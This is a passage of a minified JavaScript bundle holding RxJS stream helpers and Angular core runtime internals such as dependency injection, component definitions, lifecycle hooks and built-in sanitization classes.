T(q){try{k(i.throw(q))}catch(Y){c(Y)}}function k(q){q.done?r(q.value):function n(r){return r instanceof e?r:new e(function(c){c(r)})}(q.value).then(d,T)}k((i=i.apply(t,a||[])).next())})}function Le(t){return this instanceof Le?(this.v=t,this):new Le(t)}function $e(t,a,e){if(!Symbol.asyncIterator)throw new TypeError("Symbol.asyncIterator is not defined.");var n,i=e.apply(t,a||[]),r=[];return n={},c("next"),c("throw"),c("return"),n[Symbol.asyncIterator]=function(){return this},n;function c(te){i[te]&&(n[te]=function(pe){return new Promise(function(Re,Fe){r.push([te,pe,Re,Fe])>1||d(te,pe)})})}function d(te,pe){try{!function T(te){te.value instanceof Le?Promise.resolve(te.value.v).then(k,q):Y(r[0][2],te)}(i[te](pe))}catch(Re){Y(r[0][3],Re)}}function k(te){d("next",te)}function q(te){d("throw",te)}function Y(te,pe){te(pe),r.shift(),r.length&&d(r[0][0],r[0][1])}}function xt(t){if(!Symbol.asyncIterator)throw new TypeError("Symbol.asyncIterator is not defined.");var e,a=t[Symbol.asyncIterator];return a?a.call(t):(t=function xe(t){var a="function"==typeof Symbol&&Symbol.iterator,e=a&&t[a],i=0;if(e)return e.call(t);if(t&&"number"==typeof t.length)return{next:function(){return t&&i>=t.length&&(t=void 0),{value:t&&t[i++],done:!t}}};throw new TypeError(a?"Object is not iterable.":"Symbol.iterator is not defined.")}(t),e={},i("next"),i("throw"),i("return"),e[Symbol.asyncIterator]=function(){return this},e);function i(r){e[r]=t[r]&&function(c){return new Promise(function(d,T){!function n(r,c,d,T){Promise.resolve(T).then(function(k){r({value:k,done:d})},c)}(d,T,(c=t[r](c)).done,c.value)})}}}const Gt=t=>t&&"number"==typeof t.length&&"function"!=typeof t;function Co(t){return ie(null==t?void 0:t.then)}function jt(t){return ie(t[f])}function qt(t){return Symbol.asyncIterator&&ie(null==t?void 0:t[Symbol.asyncIterator])}function Qn(t){return new TypeError(`You provided ${null!==t&&"object"==typeof t?"an invalid object":`'${t}'`} where a stream was expected. You can provide an Observable, Promise, ReadableStream, Array, AsyncIterable, or Iterable.`)}const Zt=function Kt(){return"function"==typeof Symbol&&Symbol.iterator?Symbol.iterator:"@@iterator"}();function Bo(t){return ie(null==t?void 0:t[Zt])}function ti(t){return $e(this,arguments,function*(){const e=t.getReader();try{for(;;){const{value:i,done:n}=yield Le(e.read());if(n)return yield Le(void 0);yield yield Le(i)}}finally{e.releaseLock()}})}function ii(t){return ie(null==t?void 0:t.getReader)}function pn(t){if(t instanceof G)return t;if(null!=t){if(jt(t))return function Pt(t){return new G(a=>{const e=t[f]();if(ie(e.subscribe))return e.subscribe(a);throw new TypeError("Provided object does not correctly implement Symbol.observable")})}(t);if(Gt(t))return function Xt(t){return new G(a=>{for(let e=0;e<t.length&&!a.closed;e++)a.next(t[e]);a.complete()})}(t);if(Co(t))return function Ho(t){return new G(a=>{t.then(e=>{a.closed||(a.next(e),a.complete())},e=>a.error(e)).then(null,_)})}(t);if(qt(t))return ei(t);if(Bo(t))return function Qt(t){return new G(a=>{for(const e of t)if(a.next(e),a.closed)return;a.complete()})}(t);if(ii(t))return function $o(t){return ei(ti(t))}(t)}throw Qn(t)}function ei(t){return new G(a=>{(function ai(t,a){var e,i,n,r;return ht(this,void 0,void 0,function*(){try{for(e=xt(t);!(i=yield e.next()).done;)if(a.next(i.value),a.closed)return}catch(c){n={error:c}}finally{try{i&&!i.done&&(r=e.return)&&(yield r.call(e))}finally{if(n)throw n.error}}a.complete()})})(t,a).catch(e=>a.error(e))})}function $t(t,a,e,i=0,n=!1){const r=a.schedule(function(){e(),n?t.add(this.schedule(null,i)):this.unsubscribe()},i);if(t.add(r),!n)return r}function Ut(t,a,e=1/0){return ie(a)?Ut((i,n)=>Xe((r,c)=>a(i,r,n,c))(pn(t(i,n))),e):("number"==typeof a&&(e=a),Ie((i,n)=>function zo(t,a,e,i,n,r,c,d){const T=[];let k=0,q=0,Y=!1;const te=()=>{Y&&!T.length&&!k&&a.complete()},pe=Fe=>k<i?Re(Fe):T.push(Fe),Re=Fe=>{r&&a.next(Fe),k++;let Ne=!1;pn(e(Fe,q++)).subscribe(Ae(a,et=>{null==n||n(et),r?pe(et):a.next(et)},()=>{Ne=!0},void 0,()=>{if(Ne)try{for(k--;T.length&&k<i;){const et=T.shift();c?$t(a,c,()=>Re(et)):Re(et)}te()}catch(et){a.error(et)}}))};return t.subscribe(Ae(a,pe,()=>{Y=!0,te()})),()=>{null==d||d()}}(i,n,t,e)))}function Yt(t=1/0){return Ut(A,t)}const ua=new G(t=>t.complete());function co(t){return t&&ie(t.schedule)}function io(t){return t[t.length-1]}function yo(t){return ie(io(t))?t.pop():void 0}function Vn(t){return co(io(t))?t.pop():void 0}function Pn(t,a=0){return Ie((e,i)=>{e.subscribe(Ae(i,n=>$t(i,t,()=>i.next(n),a),()=>$t(i,t,()=>i.complete(),a),n=>$t(i,t,()=>i.error(n),a)))})}function lo(t,a=0){return Ie((e,i)=>{i.add(t.schedule(()=>e.subscribe(i),a))})}function Mo(t,a){if(!t)throw new Error("Iterable cannot be null");return new G(e=>{$t(e,a,()=>{const i=t[Symbol.asyncIterator]();$t(e,a,()=>{i.next().then(n=>{n.done?e.complete():e.next(n.value)})},0,!0)})})}function Sa(t,a){return a?function Kn(t,a){if(null!=t){if(jt(t))return function ao(t,a){return pn(t).pipe(lo(a),Pn(a))}(t,a);if(Gt(t))return function $n(t,a){return new G(e=>{let i=0;return a.schedule(function(){i===t.length?e.complete():(e.next(t[i++]),e.closed||this.schedule())})})}(t,a);if(Co(t))return function bo(t,a){return pn(t).pipe(lo(a),Pn(a))}(t,a);if(qt(t))return Mo(t,a);if(Bo(t))return function Do(t,a){return new G(e=>{let i;return $t(e,a,()=>{i=t[Zt](),$t(e,a,()=>{let n,r;try{({value:n,done:r}=i.next())}catch(c){return void e.error(c)}r?e.complete():e.next(n)},0,!0)}),()=>ie(null==i?void 0:i.return)&&i.return()})}(t,a);if(ii(t))return function no(t,a){return Mo(ti(t),a)}(t,a)}throw Qn(t)}(t,a):pn(t)}function ra(...t){const a=Vn(t),e=function Eo(t,a){return"number"==typeof io(t)?t.pop():a}(t,1/0),i=t;return i.length?1===i.length?pn(i[0]):Yt(e)(Sa(i,a)):ua}function Bd(t={}){const{connector:a=(()=>new J),resetOnError:e=!0,resetOnComplete:i=!0,resetOnRefCountZero:n=!0}=t;return r=>{let c,d,T,k=0,q=!1,Y=!1;const te=()=>{null==d||d.unsubscribe(),d=void 0},pe=()=>{te(),c=T=void 0,q=Y=!1},Re=()=>{const Fe=c;pe(),null==Fe||Fe.unsubscribe()};return Ie((Fe,Ne)=>{k++,!Y&&!q&&te();const et=T=null!=T?T:a();Ne.add(()=>{k--,0===k&&!Y&&!q&&(d=ll(Re,n))}),et.subscribe(Ne),!c&&k>0&&(c=new ve({next:ut=>et.next(ut),error:ut=>{Y=!0,te(),d=ll(pe,e,ut),et.error(ut)},complete:()=>{q=!0,te(),d=ll(pe,i),et.complete()}}),pn(Fe).subscribe(c))})(r)}}function ll(t,a,...e){if(!0===a)return void t();if(!1===a)return;const i=new ve({next:()=>{i.unsubscribe(),t()}});return a(...e).subscribe(i)}function Bn(t){for(let a in t)if(t[a]===Bn)return a;throw Error("Could not find renamed property on target object.")}function Hd(t,a){for(const e in a)a.hasOwnProperty(e)&&!t.hasOwnProperty(e)&&(t[e]=a[e])}function Wo(t){if("string"==typeof t)return t;if(Array.isArray(t))return"["+t.map(Wo).join(", ")+"]";if(null==t)return""+t;if(t.overriddenName)return`${t.overriddenName}`;if(t.name)return`${t.name}`;const a=t.toString();if(null==a)return""+a;const e=a.indexOf("\n");return-1===e?a:a.substring(0,e)}function rs(t,a){return null==t||""===t?null===a?"":a:null==a||""===a?t:t+" "+a}const w2=Bn({__forward_ref__:Bn});function ja(t){return t.__forward_ref__=ja,t.toString=function(){return Wo(this())},t}function La(t){return Xp(t)?t():t}function Xp(t){return"function"==typeof t&&t.hasOwnProperty(w2)&&t.__forward_ref__===ja}class gi extends Error{constructor(a,e){super(function Mf(t,a){return`NG0${Math.abs(t)}${a?": "+a.trim():""}`}(a,e)),this.code=a}}function Qa(t){return"string"==typeof t?t:null==t?"":String(t)}function Vu(t,a){throw new gi(-201,!1)}function mr(t,a){null==t&&function mo(t,a,e,i){throw new Error(`ASSERTION ERROR: ${t}`+(null==i?"":` [Expected=> ${e} ${i} ${a} <=Actual]`))}(a,t,null,"!=")}function hi(t){return{token:t.token,providedIn:t.providedIn||null,factory:t.factory,value:void 0}}function Ci(t){return{providers:t.providers||[],imports:t.imports||[]}}function Hu(t){return a0(t,Ll)||a0(t,vf)}function a0(t,a){return t.hasOwnProperty(a)?t[a]:null}function Yp(t){return t&&(t.hasOwnProperty(Jp)||t.hasOwnProperty(F2))?t[Jp]:null}const Ll=Bn({\u0275prov:Bn}),Jp=Bn({\u0275inj:Bn}),vf=Bn({ngInjectableDef:Bn}),F2=Bn({ngInjectorDef:Bn});var Da=(()=>((Da=Da||{})[Da.Default=0]="Default",Da[Da.Host=1]="Host",Da[Da.Self=2]="Self",Da[Da.SkipSelf=4]="SkipSelf",Da[Da.Optional=8]="Optional",Da))();let Vm;function Bs(t){const a=Vm;return Vm=t,a}function Zp(t,a,e){const i=Hu(t);return i&&"root"==i.providedIn?void 0===i.value?i.value=i.factory():i.value:e&Da.Optional?null:void 0!==a?a:void Vu(Wo(t))}function kc(t){return{toString:t}.toString()}var ec=(()=>((ec=ec||{})[ec.OnPush=0]="OnPush",ec[ec.Default=1]="Default",ec))(),dc=(()=>{return(t=dc||(dc={}))[t.Emulated=0]="Emulated",t[t.None=2]="None",t[t.ShadowDom=3]="ShadowDom",dc;var t})();const vo=(()=>"undefined"!=typeof globalThis&&globalThis||"undefined"!=typeof global&&global||"undefined"!=typeof window&&window||"undefined"!=typeof self&&"undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope&&self)(),Ud={},Xn=[],Tf=Bn({\u0275cmp:Bn}),t_=Bn({\u0275dir:Bn}),i_=Bn({\u0275pipe:Bn}),n0=Bn({\u0275mod:Bn}),mc=Bn({\u0275fac:Bn}),qd=Bn({__NG_ELEMENT_ID__:Bn});let H2=0;function Wt(t){return kc(()=>{const e=!0===t.standalone,i={},n={type:t.type,providersResolver:null,decls:t.decls,vars:t.vars,factory:null,template:t.template||null,consts:t.consts||null,ngContentSelectors:t.ngContentSelectors,hostBindings:t.hostBindings||null,hostVars:t.hostVars||0,hostAttrs:t.hostAttrs||null,contentQueries:t.contentQueries||null,declaredInputs:i,inputs:null,outputs:null,exportAs:t.exportAs||null,onPush:t.changeDetection===ec.OnPush,directiveDefs:null,pipeDefs:null,standalone:e,dependencies:e&&t.dependencies||null,getStandaloneInjector:null,selectors:t.selectors||Xn,viewQuery:t.viewQuery||null,features:t.features||null,data:t.data||{},encapsulation:t.encapsulation||dc.Emulated,id:"c"+H2++,styles:t.styles||Xn,_:null,setInput:null,schemas:t.schemas||null,tView:null},r=t.dependencies,c=t.features;return n.inputs=Uu(t.inputs,i),n.outputs=Uu(t.outputs),c&&c.forEach(d=>d(n)),n.directiveDefs=r?()=>("function"==typeof r?r():r).map(o0).filter(a_):null,n.pipeDefs=r?()=>("function"==typeof r?r():r).map(tn).filter(a_):null,n})}function Ds(t,a,e){const i=t.\u0275cmp;i.directiveDefs=()=>("function"==typeof a?a():a).map(o0),i.pipeDefs=()=>("function"==typeof e?e():e).map(tn)}function o0(t){return Un(t)||ur(t)}function a_(t){return null!==t}function yi(t){return kc(()=>({type:t.type,bootstrap:t.bootstrap||Xn,declarations:t.declarations||Xn,imports:t.imports||Xn,exports:t.exports||Xn,transitiveCompileScopes:null,schemas:t.schemas||null,id:t.id||null}))}function Uu(t,a){if(null==t)return Ud;const e={};for(const i in t)if(t.hasOwnProperty(i)){let n=t[i],r=n;Array.isArray(n)&&(r=n[1],n=n[0]),e[n]=i,a&&(a[n]=r)}return e}const Ot=Wt;function Fr(t){return{type:t.type,name:t.name,factory:null,pure:!1!==t.pure,standalone:!0===t.standalone,onDestroy:t.type.prototype.ngOnDestroy||null}}function Un(t){return t[Tf]||null}function ur(t){return t[t_]||null}function tn(t){return t[i_]||null}function ls(t,a){const e=t[n0]||null;if(!e&&!0===a)throw new Error(`Type ${Wo(t)} does not have '\u0275mod' property.`);return e}function ms(t){return Array.isArray(t)&&"object"==typeof t[1]}function Is(t){return Array.isArray(t)&&!0===t[1]}function Gu(t){return 0!=(8&t.flags)}function ml(t){return 2==(2&t.flags)}function uc(t){return 1==(1&t.flags)}function gr(t){return null!==t.template}function s0(t){return 0!=(256&t[2])}function Qd(t,a){return t.hasOwnProperty(mc)?t[mc]:null}class u0{constructor(a,e,i){this.previousValue=a,this.currentValue=e,this.firstChange=i}isFirstChange(){return this.firstChange}}function sa(){return h0}function h0(t){return t.type.prototype.ngOnChanges&&(t.setInput=If),f0}function f0(){const t=s_(this),a=null==t?void 0:t.current;if(a){const e=t.previous;if(e===Ud)t.previous=a;else for(let i in a)e[i]=a[i];t.current=null,this.ngOnChanges(a)}}function If(t,a,e,i){const n=s_(t)||function X2(t,a){return t[p0]=a}(t,{previous:Ud,current:null}),r=n.current||(n.current={}),c=n.previous,d=this.declaredInputs[e],T=c[d];r[d]=new u0(T&&T.currentValue,a,c===Ud),t[i]=a}sa.ngInherit=!0;const p0="__ngSimpleChanges__";function s_(t){return t[p0]||null}function Ar(t){for(;Array.isArray(t);)t=t[0];return t}function $d(t,a){return Ar(a[t])}function pc(t,a){return Ar(a[t.index])}function m_(t,a){return t.data[a]}function Nc(t,a){return t[a]}function us(t,a){const e=a[t];return ms(e)?e:e[0]}function Um(t){return 64==(64&t[2])}function Rs(t,a){return null==a?null:t[a]}function u_(t){t[18]=0}function rd(t,a){t[5]+=a;let e=t,i=t[3];for(;null!==i&&(1===a&&1===e[5]||-1===a&&0===e[5]);)i[5]+=a,e=i,i=i[3]}const Ua={lFrame:v0(null),bindingsEnabled:!0};function Ku(){return Ua.bindingsEnabled}function bi(){return Ua.lFrame.lView}function Rn(){return Ua.lFrame.tView}function be(t){return Ua.lFrame.contextLView=t,t[8]}function Me(t){return Ua.lFrame.contextLView=null,t}function nr(){let t=Pf();for(;null!==t&&64===t.type;)t=t.parent;return t}function Pf(){return Ua.lFrame.currentTNode}function _c(t,a){const e=Ua.lFrame;e.currentTNode=t,e.isParent=a}function Xu(){return Ua.lFrame.isParent}function Yu(){Ua.lFrame.isParent=!1}function hs(){const t=Ua.lFrame;let a=t.bindingRootIndex;return-1===a&&(a=t.bindingRootIndex=t.tView.bindingStartIndex),a}function ul(){return Ua.lFrame.bindingIndex}function sd(){return Ua.lFrame.bindingIndex++}function hl(t){const a=Ua.lFrame,e=a.bindingIndex;return a.bindingIndex=a.bindingIndex+t,e}function Gm(t,a){const e=Ua.lFrame;e.bindingIndex=e.bindingRootIndex=t,g_(a)}function g_(t){Ua.lFrame.currentDirectiveIndex=t}function Of(t){const a=Ua.lFrame.currentDirectiveIndex;return-1===a?null:t[a]}function cd(){return Ua.lFrame.currentQueryIndex}function C_(t){Ua.lFrame.currentQueryIndex=t}function Lc(t){const a=t[1];return 2===a.type?a.declTNode:1===a.type?t[6]:null}function M0(t,a,e){if(e&Da.SkipSelf){let n=a,r=t;for(;!(n=n.parent,null!==n||e&Da.Host||(n=Lc(r),null===n||(r=r[15],10&n.type))););if(null===n)return!1;a=n,t=r}const i=Ua.lFrame=b_();return i.currentTNode=a,i.lView=t,!0}function y_(t){const a=b_(),e=t[1];Ua.lFrame=a,a.currentTNode=e.firstChild,a.lView=t,a.tView=e,a.contextLView=t,a.bindingIndex=e.bindingStartIndex,a.inI18n=!1}function b_(){const t=Ua.lFrame,a=null===t?null:t.child;return null===a?v0(t):a}function v0(t){const a={currentTNode:null,isParent:!0,lView:null,tView:null,selectedIndex:-1,contextLView:null,elementDepthCount:0,currentNamespace:null,currentDirectiveIndex:-1,bindingRootIndex:-1,bindingIndex:-1,currentQueryIndex:0,parent:t,child:null,inI18n:!1};return null!==t&&(t.child=a),a}function A0(){const t=Ua.lFrame;return Ua.lFrame=t.parent,t.currentTNode=null,t.lView=null,t}const Tr=A0;function M_(){const t=A0();t.isParent=!0,t.tView=null,t.selectedIndex=-1,t.contextLView=null,t.elementDepthCount=0,t.currentDirectiveIndex=-1,t.currentNamespace=null,t.bindingRootIndex=-1,t.bindingIndex=-1,t.currentQueryIndex=0}function Ss(){return Ua.lFrame.selectedIndex}function fl(t){Ua.lFrame.selectedIndex=t}function or(){const t=Ua.lFrame;return m_(t.tView,t.selectedIndex)}function fi(){Ua.lFrame.currentNamespace="svg"}function ln(){!function cC(){Ua.lFrame.currentNamespace=null}()}function Ju(t,a){for(let e=a.directiveStart,i=a.directiveEnd;e<i;e++){const r=t.data[e].type.prototype,{ngAfterContentInit:c,ngAfterContentChecked:d,ngAfterViewInit:T,ngAfterViewChecked:k,ngOnDestroy:q}=r;c&&(t.contentHooks||(t.contentHooks=[])).push(-e,c),d&&((t.contentHooks||(t.contentHooks=[])).push(e,d),(t.contentCheckHooks||(t.contentCheckHooks=[])).push(e,d)),T&&(t.viewHooks||(t.viewHooks=[])).push(-e,T),k&&((t.viewHooks||(t.viewHooks=[])).push(e,k),(t.viewCheckHooks||(t.viewCheckHooks=[])).push(e,k)),null!=q&&(t.destroyHooks||(t.destroyHooks=[])).push(e,q)}}function ji(t,a,e){Nf(t,a,3,e)}function Zu(t,a,e,i){(3&t[2])===e&&Nf(t,a,e,i)}function v_(t,a){let e=t[2];(3&e)===a&&(e&=2047,e+=1,t[2]=e)}function Nf(t,a,e,i){const r=null!=i?i:-1,c=a.length-1;let d=0;for(let T=void 0!==i?65535&t[18]:0;T<c;T++)if("number"==typeof a[T+1]){if(d=a[T],null!=i&&d>=i)break}else a[T]<0&&(t[18]+=65536),(d<r||-1==r)&&(pl(t,e,a,T),t[18]=(4294901760&t[18])+T+2),T++}function pl(t,a,e,i){const n=e[i]<0,r=e[i+1],d=t[n?-e[i]:e[i]];if(n){if(t[2]>>11<t[18]>>16&&(3&t[2])===a){t[2]+=2048;try{r.call(d)}finally{}}}else try{r.call(d)}finally{}}class ld{constructor(a,e,i){this.factory=a,this.resolving=!1,this.canSeeViewProviders=e,this.injectImpl=i}}function Lf(t,a,e){let i=0;for(;i<e.length;){const n=e[i];if("number"==typeof n){if(0!==n)break;i++;const r=e[i++],c=e[i++],d=e[i++];t.setAttribute(a,c,d,r)}else{const r=n,c=e[++i];T_(r)?t.setProperty(a,r,c):t.setAttribute(a,r,c),i++}}return i}function th(t){return 3===t||4===t||6===t}function T_(t){return 64===t.charCodeAt(0)}function jm(t,a){if(null!==a&&0!==a.length)if(null===t||0===t.length)t=a.slice();else{let e=-1;for(let i=0;i<a.length;i++){const n=a[i];"number"==typeof n?e=n:0===e||D0(t,e,n,null,-1===e||2===e?a[++i]:null)}}return t}function D0(t,a,e,i,n){let r=0,c=t.length;if(-1===a)c=-1;else for(;r<t.length;){const d=t[r++];if("number"==typeof d){if(d===a){c=-1;break}if(d>a){c=r-1;break}}}for(;r<t.length;){const d=t[r];if("number"==typeof d)break;if(d===e){if(null===i)return void(null!==n&&(t[r+1]=n));if(i===t[r+1])return void(t[r+2]=n)}r++,null!==i&&r++,null!==n&&r++}-1!==c&&(t.splice(c,0,a),r=c+1),t.splice(r++,0,e),null!==i&&t.splice(r++,0,i),null!==n&&t.splice(r++,0,n)}function x0(t){return-1!==t}function dd(t){return 32767&t}function Qm(t,a){let e=function uC(t){return t>>16}(t),i=a;for(;e>0;)i=i[15],e--;return i}let ih=!0;function zf(t){const a=ih;return ih=t,a}let I0=0;const gl={};function ah(t,a){const e=D_(t,a);if(-1!==e)return e;const i=a[1];i.firstCreatePass&&(t.injectorIndex=a.length,$m(i.data,t),$m(a,null),$m(i.blueprint,null));const n=Jd(t,a),r=t.injectorIndex;if(x0(n)){const c=dd(n),d=Qm(n,a),T=d[1].data;for(let k=0;k<8;k++)a[r+k]=d[c+k]|T[c+k]}return a[r+8]=n,r}function $m(t,a){t.push(0,0,0,0,0,0,0,0,a)}function D_(t,a){return-1===t.injectorIndex||t.parent&&t.parent.injectorIndex===t.injectorIndex||null===a[t.injectorIndex+8]?-1:t.injectorIndex}function Jd(t,a){if(t.parent&&-1!==t.parent.injectorIndex)return t.parent.injectorIndex;let e=0,i=null,n=a;for(;null!==n;){if(i=P0(n),null===i)return-1;if(e++,n=n[15],-1!==i.injectorIndex)return i.injectorIndex|e<<16}return-1}function Km(t,a,e){!function R0(t,a,e){let i;"string"==typeof e?i=e.charCodeAt(0)||0:e.hasOwnProperty(qd)&&(i=e[qd]),null==i&&(i=e[qd]=I0++);const n=255&i;a.data[t+(n>>5)]|=1<<n}(t,a,e)}function x_(t,a,e){if(e&Da.Optional||void 0!==t)return t;Vu()}function w_(t,a,e,i){if(e&Da.Optional&&void 0===i&&(i=null),0==(e&(Da.Self|Da.Host))){const n=t[9],r=Bs(void 0);try{return n?n.get(a,i,e&Da.Optional):Zp(a,i,e&Da.Optional)}finally{Bs(r)}}return x_(i,0,e)}function Zd(t,a,e,i=Da.Default,n){if(null!==t){if(1024&a[2]){const c=function R_(t,a,e,i,n){let r=t,c=a;for(;null!==r&&null!==c&&1024&c[2]&&!(256&c[2]);){const d=md(r,c,e,i|Da.Self,gl);if(d!==gl)return d;let T=r.parent;if(!T){const k=c[21];if(k){const q=k.get(e,gl,i);if(q!==gl)return q}T=P0(c),c=c[15]}r=T}return n}(t,a,e,i,gl);if(c!==gl)return c}const r=md(t,a,e,i,gl);if(r!==gl)return r}return w_(a,e,i,n)}function md(t,a,e,i,n){const r=function k0(t){if("string"==typeof t)return t.charCodeAt(0)||0;const a=t.hasOwnProperty(qd)?t[qd]:void 0;return"number"==typeof a?a>=0?255&a:fC:a}(e);if("function"==typeof r){if(!M0(a,t,i))return i&Da.Host?x_(n,0,i):w_(a,e,i,n);try{const c=r(i);if(null!=c||i&Da.Optional)return c;Vu()}finally{Tr()}}else if("number"==typeof r){let c=null,d=D_(t,a),T=-1,k=i&Da.Host?a[16][6]:null;for((-1===d||i&Da.SkipSelf)&&(T=-1===d?Jd(t,a):a[d+8],-1!==T&&Wf(i,!1)?(c=a[1],d=dd(T),a=Qm(T,a)):d=-1);-1!==d;){const q=a[1];if(I_(r,d,q.data)){const Y=Cl(d,a,e,c,i,k);if(Y!==gl)return Y}T=a[d+8],-1!==T&&Wf(i,a[1].data[d+8]===k)&&I_(r,d,a)?(c=q,d=dd(T),a=Qm(T,a)):d=-1}}return n}function Cl(t,a,e,i,n,r){const c=a[1],d=c.data[t+8],q=nh(d,c,e,null==i?ml(d)&&ih:i!=c&&0!=(3&d.type),n&Da.Host&&r===d);return null!==q?Xm(a,c,q,d):gl}function nh(t,a,e,i,n){const r=t.providerIndexes,c=a.data,d=1048575&r,T=t.directiveStart,q=r>>20,te=n?d+q:t.directiveEnd;for(let pe=i?d:d+q;pe<te;pe++){const Re=c[pe];if(pe<T&&e===Re||pe>=T&&Re.type===e)return pe}if(n){const pe=c[T];if(pe&&gr(pe)&&pe.type===e)return T}return null}function Xm(t,a,e,i){let n=t[e];const r=a.data;if(function eh(t){return t instanceof ld}(n)){const c=n;c.resolving&&function I2(t,a){const e=a?`. Dependency path: ${a.join(" > ")} > ${t}`:"";throw new gi(-200,`Circular dependency in DI detected for ${t}${e}`)}(function Hn(t){return"function"==typeof t?t.name||t.toString():"object"==typeof t&&null!=t&&"function"==typeof t.type?t.type.name||t.type.toString():Qa(t)}(r[e]));const d=zf(c.canSeeViewProviders);c.resolving=!0;const T=c.injectImpl?Bs(c.injectImpl):null;M0(t,i,Da.Default);try{n=t[e]=c.factory(void 0,r,t,i),a.firstCreatePass&&e>=i.directiveStart&&function dC(t,a,e){const{ngOnChanges:i,ngOnInit:n,ngDoCheck:r}=a.type.prototype;if(i){const c=h0(a);(e.preOrderHooks||(e.preOrderHooks=[])).push(t,c),(e.preOrderCheckHooks||(e.preOrderCheckHooks=[])).push(t,c)}n&&(e.preOrderHooks||(e.preOrderHooks=[])).push(0-t,n),r&&((e.preOrderHooks||(e.preOrderHooks=[])).push(t,r),(e.preOrderCheckHooks||(e.preOrderCheckHooks=[])).push(t,r))}(e,r[e],a)}finally{null!==T&&Bs(T),zf(d),c.resolving=!1,Tr()}}return n}function I_(t,a,e){return!!(e[a+(t>>5)]&1<<t)}function Wf(t,a){return!(t&Da.Self||t&Da.Host&&a)}class Ym{constructor(a,e){this._tNode=a,this._lView=e}get(a,e,i){return Zd(this._tNode,this._lView,a,i,e)}}function fC(){return new Ym(nr(),bi())}function ba(t){return kc(()=>{const a=t.prototype.constructor,e=a[mc]||Us(a),i=Object.prototype;let n=Object.getPrototypeOf(t.prototype).constructor;for(;n&&n!==i;){const r=n[mc]||Us(n);if(r&&r!==e)return r;n=Object.getPrototypeOf(n)}return r=>new r})}function Us(t){return Xp(t)?()=>{const a=Us(La(t));return a&&a()}:Qd(t)}function P0(t){const a=t[1],e=a.type;return 2===e?a.declTNode:1===e?t[6]:null}function Vr(t){return function S0(t,a){if("class"===a)return t.classes;if("style"===a)return t.styles;const e=t.attrs;if(e){const i=e.length;let n=0;for(;n<i;){const r=e[n];if(th(r))break;if(0===r)n+=2;else if("number"==typeof r)for(n++;n<i&&"string"==typeof e[n];)n++;else{if(r===a)return e[n+1];n+=2}}}return null}(nr(),t)}const Hl="__parameters__";function tm(t,a,e){return kc(()=>{const i=function Ff(t){return function(...e){if(t){const i=t(...e);for(const n in i)this[n]=i[n]}}}(a);function n(...r){if(this instanceof n)return i.apply(this,r),this;const c=new n(...r);return d.annotation=c,d;function d(T,k,q){const Y=T.hasOwnProperty(Hl)?T[Hl]:Object.defineProperty(T,Hl,{value:[]})[Hl];for(;Y.length<=q;)Y.push(null);return(Y[q]=Y[q]||[]).push(c),T}}return e&&(n.prototype=Object.create(e.prototype)),n.prototype.ngMetadataName=t,n.annotationCls=n,n})}class ni{constructor(a,e){this._desc=a,this.ngMetadataName="InjectionToken",this.\u0275prov=void 0,"number"==typeof e?this.__NG_ELEMENT_ID__=e:void 0!==e&&(this.\u0275prov=hi({token:this,providedIn:e.providedIn||"root",factory:e.factory}))}get multi(){return this}toString(){return`InjectionToken ${this._desc}`}}function ac(t,a){void 0===a&&(a=t);for(let e=0;e<t.length;e++){let i=t[e];Array.isArray(i)?(a===t&&(a=t.slice(0,e)),ac(i,a)):a!==t&&a.push(i)}return a}function zc(t,a){t.forEach(e=>Array.isArray(e)?zc(e,a):a(e))}function O_(t,a,e){a>=t.length?t.push(e):t.splice(a,0,e)}function rh(t,a){return a>=t.length-1?t.pop():t.splice(a,1)[0]}function ud(t,a){const e=[];for(let i=0;i<t;i++)e.push(a);return e}function ps(t,a,e){let i=yl(t,a);return i>=0?t[1|i]=e:(i=~i,function L_(t,a,e,i){let n=t.length;if(n==a)t.push(e,i);else if(1===n)t.push(i,t[0]),t[0]=e;else{for(n--,t.push(t[n-1],t[n]);n>a;)t[n]=t[n-2],n--;t[a]=e,t[a+1]=i}}(t,i,a,e)),i}function ch(t,a){const e=yl(t,a);if(e>=0)return t[1|e]}function yl(t,a){return function hd(t,a,e){let i=0,n=t.length>>e;for(;n!==i;){const r=i+(n-i>>1),c=t[r<<e];if(a===c)return r<<e;c>a?n=r:i=r+1}return~(n<<e)}(t,a,1)}const pi={},Hi="__NG_DI_FLAG__",pa="ngTempTokenPath",ca=/\n/gm,Dr="__source";let Ao;function rr(t){const a=Ao;return Ao=t,a}function Wc(t,a=Da.Default){if(void 0===Ao)throw new gi(-203,!1);return null===Ao?Zp(t,void 0,a):Ao.get(t,a&Da.Optional?null:void 0,a)}function At(t,a=Da.Default){return(function Af(){return Vm}()||Wc)(La(t),a)}function Po(t,a=Da.Default){return"number"!=typeof a&&(a=0|(a.optional&&8)|(a.host&&1)|(a.self&&2)|(a.skipSelf&&4)),At(t,a)}function Bf(t){const a=[];for(let e=0;e<t.length;e++){const i=La(t[e]);if(Array.isArray(i)){if(0===i.length)throw new gi(900,!1);let n,r=Da.Default;for(let c=0;c<i.length;c++){const d=i[c],T=dh(d);"number"==typeof T?-1===T?n=d.token:r|=T:n=d}a.push(At(n,r))}else a.push(At(i))}return a}function eu(t,a){return t[Hi]=a,t.prototype[Hi]=a,t}function dh(t){return t[Hi]}const Cc=eu(tm("Optional"),8),Fc=eu(tm("SkipSelf"),4);let U_,L0,z0;function Uf(t){var a;return(null===(a=function TC(){if(void 0===L0&&(L0=null,vo.trustedTypes))try{L0=vo.trustedTypes.createPolicy("angular",{createHTML:t=>t,createScript:t=>t,createScriptURL:t=>t})}catch(t){}return L0}())||void 0===a?void 0:a.createHTML(t))||t}function xC(){if(void 0===z0&&(z0=null,vo.trustedTypes))try{z0=vo.trustedTypes.createPolicy("angular#unsafe-bypass",{createHTML:t=>t,createScript:t=>t,createScriptURL:t=>t})}catch(t){}return z0}function wC(t){var a;return(null===(a=xC())||void 0===a?void 0:a.createHTML(t))||t}function XM(t){var a;return(null===(a=xC())||void 0===a?void 0:a.createScriptURL(t))||t}class ph{constructor(a){this.changingThisBreaksApplicationSecurity=a}toString(){return`SafeValue must use [property]=binding: ${this.changingThisBreaksApplicationSecurity} (see https://g.co/ng/security#xss)`}}class oE extends ph{getTypeName(){return"HTML"}}class rE extends ph{getTypeName(){return"Style"}}class IC extends ph{getTypeName(){return"Script"}}class sE extends ph{getTypeName(){return"URL"}}class RC extends ph{getTypeName(){return"ResourceURL"}}function Bc(t){return t instanceof ph?t.changingThisBreaksApplicationSecurity:t}function Fi(t,a){const e=function qf(t){return t instanceof 